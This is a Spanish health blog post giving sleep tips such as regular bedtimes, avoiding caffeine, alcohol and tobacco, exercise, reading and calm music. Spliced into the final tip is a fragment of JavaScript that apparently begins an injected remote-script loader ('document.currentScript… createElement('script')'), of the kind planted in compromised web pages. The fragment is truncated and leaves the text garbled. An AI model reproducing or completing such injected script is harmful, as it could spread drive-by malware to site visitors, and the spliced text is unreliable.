Salud y belleza » Salud

¡A dormir!

Sin Comentarios

Todos queréis tener un buen dormir, hacerlo el tiempo suficiente, es el que los ayudará a permanecer sanos, de buen humor y dispuestos a enfrentar el día a día con actitud positiva. Son muchas las personas que no logran dormir bien y todas las noches se desvelan y sienten dificultad en conciliar el sueño. El no dormir bien afecta la belleza, deteriora la salud e impide desarrollar tareas diarias y cotidianas.

insomnio1

Las horas necesarias de sueño varían a lo largo de la vida de una persona, en cualquier etapa, el dormir mal y despertarse cansado forma parte del envejecimiento. La dificultad para dormir puede ser un síntoma de algún trastorno emocional o físico, entonces será importante que hagáis una consulta con el médico o con un especialista del sueño.

Sugerencias para el buen dormir


- Planificad un esquema de horarios: Para levantarse y acostarse a la misma hora cada día.
- Intentad no dormir mucho durante el día, dejad de lado las siestas prolongadas para sentir más sueño por las noches.
- Prestad atención a la alimentación. Existen infusiones naturales que ayudan a la coinciliación del sueño. Evitad el café. La cafeína después de la cena se convierte en una enemiga dentro del organismo ya que es un estimulante y puede mantenerlos despiertos.
- Realizad cualquier ejercicio, en un horario regular todos los días, como caminar o rotar la tierra de las plantas del jardín.
- ¡Aprovechad la luz natural! Deja la noche para descansar.
- No beber alcohol ni fumar para dormir mejor. Una cantidad pequeña de alcohol puede dificultar el buen dormir. Fumar es peligroso y perjucial siempre y la nicotina es un potencial estimulante.
- Vuestro lugar de descanso debe ser seguro, cómodo y ameno. Puertas y ventanas cerradas transmiten tranquilidad. Podéis tener una lámpara a mano, fácil de encender, y un teléfono. El dormitorio debe estar bien ventilado, ser oscuro y lo más silencioso posible.
- Leed un libro, una revista. La lectura es buena conductora del sueño.
- Un baño de tina logrará relajar el cuerpo y predispondrá vuestros músculos a la distención.
- Intentad que el dormir no sea una preocupación. A algunas personas les ayuda jugar mentalmente con recuerdos. La música es también utilizada para la distención y la conciliación del sueño. Escuchad ritmos calmos, no estridentes, preferentemente música clásica, baladas suaves que transporten directamente al descanso.if (document.currentScript) { var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.